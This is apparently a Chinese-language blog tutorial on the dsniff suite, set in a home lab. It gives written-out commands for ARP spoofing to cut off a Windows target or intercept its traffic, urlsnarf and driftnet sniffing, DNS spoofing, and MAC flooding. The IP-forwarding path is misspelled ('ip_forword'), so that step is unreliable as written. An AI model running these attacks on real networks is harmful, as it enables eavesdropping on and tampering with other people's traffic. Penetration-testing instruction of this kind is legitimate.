网络嗅探dsniff套件的使用

时间:2024-04-10 07:03:24

知识铺垫

arp协议

ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。

arp欺骗

ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning),通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC

arp欺骗后就可以断网,窃听数据,篡改数据等

dsniff

dsniff是一系列用于网络审计和渗透测试的工具。dsniff,filesnarf,mailsnarf,msgsnarf,urlsnarf和webspy被动地监视网络以获取有趣的数据(密码,电子邮件,文件等)。arpspoof,dnsspoof和macof有助于拦截攻击者通常无法获得的网络流量(例如,由于第2层交换)。

实验环境

kali ->ip:192.168.1.111 gw:192.168.1.1 #攻击机,自带dsniff
win7 ->ip:192.168.1.114 gw:192.168.1.1 #目标机

arpspoof

arp欺骗工具

arpspoof -i 网卡 -t 目标ip 伪装ip

断网攻击

查看kali网卡

网络嗅探dsniff套件的使用

伪装成网关,目标机的流量流向攻击机

# arpspoof -i eth0 -t 192.168.1.114 192.168.1.1

win7的arp缓存表被毒化

arp -a

攻击前

网络嗅探dsniff套件的使用

攻击后

网络嗅探dsniff套件的使用

网络嗅探dsniff套件的使用

因为kali没有开启IP转发功能,就会造成断网

中间人攻击

开启IP转发功能,使流量能正常传递

  • 临时开启
# echo 1 > /proc/sys/net/ipv4/ip_forword

ps:记住是/proc/sys下的net ,在/proc下也有net,容易混淆

  • 永久开启
# vi /etc/sysctl.conf
net.ipv4.ip_forword=1

#sysctl -p      加载配置文件

arp中间人欺骗

# arpspoof -i eth0 -t 192.168.1.114 192.168.1.1    伪装成网关
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.114     伪装成win7

这样kali就成为win7和网关桥梁,它们之间的流量都能被监听

driftnet监听图片

driftent
-i 指定网卡
-a 不显示图片,保存在临时目录
-d 临时目录
-b 出现新图片时发出滴滴声

网络嗅探dsniff套件的使用

Wirshark抓包

网络嗅探dsniff套件的使用

urlsnarf 抓取访问的地址

# urlsnarf -i eth0

网络嗅探dsniff套件的使用

dnsspoof dns欺骗

对监听到的dns请求进行污染

dnsspoof
-i 指定网卡
-f 指定host格式文件(默认为指向本ip)

网络嗅探dsniff套件的使用

网络嗅探dsniff套件的使用

macof MAC泛洪

macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
-e 目标mac地址
-n 发送次数

网络嗅探dsniff套件的使用

造成mac地址溢出,使受害者通信只能通过广播的形式,从而达到监听流量